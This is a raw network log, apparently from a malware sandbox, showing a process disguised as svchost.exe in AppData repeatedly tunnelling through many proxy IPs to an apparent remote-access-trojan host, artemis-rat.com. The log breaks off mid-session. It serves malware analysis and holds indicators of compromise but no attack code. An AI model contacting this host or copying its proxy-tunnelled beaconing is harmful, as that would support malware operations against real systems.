                                                                                    Mar 9, 2024 13:14:36.985913038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.140393972 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3536192.168.2.557567109.86.182.203312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.995126963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3537192.168.2.56121852.13.248.29312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.995327950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.186242104 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3538192.168.2.56126845.12.31.38043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.995798111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.154820919 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3539192.168.2.561040103.49.114.195808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:36.996618032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3540192.168.2.561272185.162.230.2018043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.000492096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.155314922 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3541192.168.2.56113746.17.63.166948043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.002744913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3542192.168.2.56113552.16.232.164312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.007225990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.313221931 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3543192.168.2.561278104.22.1.1138043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.007685900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.162292957 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3544192.168.2.561284104.18.220.958043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.012042046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.166449070 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3545192.168.2.561123128.199.221.91717643220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.041429996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846124887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3546192.168.2.561120103.118.46.177808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.048425913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3547192.168.2.557699186.96.50.2099943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.056031942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.646007061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.333864927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3548192.168.2.561100103.163.51.2548043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.058181047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.458854914 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3549192.168.2.56114794.247.241.705364043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.075582027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846306086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3550192.168.2.56122852.196.1.1828043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.075639963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.343141079 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:37.492099047 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ac 90 31 e7 be e8 a5 a0 c8 34 9b 85 ec 08 76 b9 d6 33 13 67 b6 50 ce 4f fd 30 32 06 58 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR14v3gPO02X*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:37.760390043 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 63 ae b1 38 8b 41 36 5a c7 58 89 6f 08 98 11 27 7f ce 2b 7e f9 3d 3f b5 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9c8A6ZXo'+~=?DOWNGRD0000*H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0*H0LU,m-YLa


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3551192.168.2.56111613.234.24.116312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.081268072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.482995987 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3552192.168.2.561072102.132.201.2028043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.081723928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.127774954 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3553192.168.2.561165134.209.105.209312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.087435961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3554192.168.2.561159201.13.147.161567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.091676950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3555192.168.2.5612305.135.83.2148043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.119308949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.447462082 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3556192.168.2.561186167.86.69.1424221443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.123380899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.974073887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3557192.168.2.561196222.223.103.232730243220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.124068975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.478981018 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3558192.168.2.561320142.4.123.418043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.124413013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3559192.168.2.557735139.162.238.1842987043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.125737906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3560192.168.2.56116465.1.40.47108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.136534929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.521250010 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3561192.168.2.560996111.53.178.249730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.145271063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
